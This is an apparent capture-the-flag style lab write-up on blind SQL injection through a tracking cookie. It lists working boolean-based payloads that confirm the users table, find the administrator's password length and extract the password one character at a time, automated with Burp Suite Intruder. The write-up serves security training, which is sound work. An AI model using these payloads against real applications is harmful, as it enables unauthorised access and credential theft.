Lab #9: Blind SQL injection with conditional responses

Target:
  log in as the administrator user.  
Hint: 
  This lab contains a blind SQL injection vulnerability. 
  The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.

  The results of the SQL query are not returned, and no error messages are displayed. 
  But the application includes a Welcome back message in the page if the query returns any rows.

  The database contains a different table called users, with columns called username and password. 
  You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.

Solution:

  1- search for some input vulnerable to sqlinjection
    the TranckingId parameter in the cookie seems to be vulnerable:
    when the trackId exists the return response contains "welcome back" message

    change the trackId : the return has no welcome back message

    now test:
      ' and 1=1--  : welcome back

      ' and 1=0--   : no welcome back

    2- confirm that there is a users table:

    ' and (select 'x' from users LIMIT 1)='x'--
    result: welcome back!
    so there is such table


    3- confirm that there is a user, named administrator

       ' and (select username from users where username='administrator')='administrator'--
        result: welcome back!
        so the user administrator exists

    4- check for the length of password for administrator
        ' and (select username from users where username='administrator' and LENGTH(password)>1)='administrator'--
      make it to check for length 30 and result: no welcome back message.
      So the length is smaller than 30
      But it is not possible to do all tests manually.
      So send the get request to burpsuit intruder
      select number 1 (length and add this attack position)
      in the payload select type as number, sequentional and from 1 to 30.
      start the attack. 
      you see that from the 20th attack request the length of response is less, as it has no welcome message.
      That means length of password is exactly 20 characters.
    
    5- enumerate the characters of password one by one

        ' and (select substring(password,1,1) from users where username='administrator')='a'--

      desc: select a substring of password column, which is 1 character long strarting from the 1st character.
      if it is equal to a, we have welcome back message in the result
      use the burpsuit intruder and use payload type as bruteforcer min len=1, max len=1

      result: the first character is '4'

      to repeat it for all 20 characters:
      use burpsuit intruder
      select attack type as cluster bomb
            ' and (select substring(password,ยง1ยง ,1) from users where username='administrator')='ยงaยง'--

            and select both offset and password character as the payload position, 
              and setup each payload type.

    
